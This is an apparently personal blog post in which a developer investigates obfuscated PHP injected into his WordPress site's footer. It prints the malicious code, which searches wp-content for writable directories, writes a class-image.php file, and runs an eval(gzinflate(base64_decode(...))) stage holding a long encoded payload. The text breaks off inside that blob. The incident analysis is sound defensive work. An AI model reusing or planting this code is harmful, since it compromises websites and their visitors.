Dealing with code injection.

Okay, so twice in as many weeks I’ve hit the front page of taktak.co.uk and found that the footer has been missing and my Last.fm plugin isn’t displaying items. After a bit of poking, I stumbled across some obfuscated code tagged on to the footer after the html end tag.
Annoying right? I noticed it, I beefed up security massively, locked down some sloppy open doors in WordPress and thought that was it. Indeed, until a week later it seemed that it was, but then my footer didn’t render again. Sure enough, there is some injected code at the end of the footer, guess I didn’t fix the problem afterall… It was at this point that I had some time on my hands and decided that I should probably figure out exactly what the code was doing rather than blindly deleting it. In fact, I should probably reverse engineer the code to make it fix everything that it has possibly touched…

Warning, this is very code heavy and not the usual post for the site, you’ve been warned! I’ve also noticed that my code tags don’t wrap properly, guess I need to fix my CSS!

Without further ado, the following is the raw code which I pulled from the footer, all 17,000+ characters of it…:

');$dir = ABSPATH. 'wp-content';$wdir = end(get_leaf_dirs($dir));$f = fopen($wdir . "/class-image.php", "w+");fwrite($f, $str);fclose($f);echo "";function get_leaf_dirs($dir) {$array = array();$d = dir($dir);while (false !== ($entry = $d->read())) {if($entry!='.' && $entry!='..') {$entry = $dir.'/'.$entry;if(is_dir($entry) && is_writable($entry)) {$subdirs = get_leaf_dirs($entry);if ($subdirs)$array = array_merge($array, $subdirs);else$array[] = $entry;}}}$d->close();return $array;}?>

So being a software engineer, the first thing that jumps out is that array? What is ‘a’ holding? First thoughts are base64 encoding and gzinflate due to the lettering that it contains. It was at this point that I started working it all out on the back of an envelope:

Obfuscated code

I abandoned it halfway through and took to Excel (Yes really..) purely so that I could tab through all of the array accesses rather than possibly make a mistake on my envelope.

ObfuscatedCodeExcel

Once excel had given me my answers I backfilled the envelope for completeness… The output confirmed by previous best guess so I set about decoding the bulk of the code with the help of browser based decoders (Okay, I’m too lazy to install PHP and echo the output, so sue me!)
I plumbed the function in as it would be now that we know the ordering:

eval(gzinflate(base64_decode($v)))

With $v being the passed in parameter of the encoded data from above.

The output of the decode was thus:

eval(gzinflate(base64_decode('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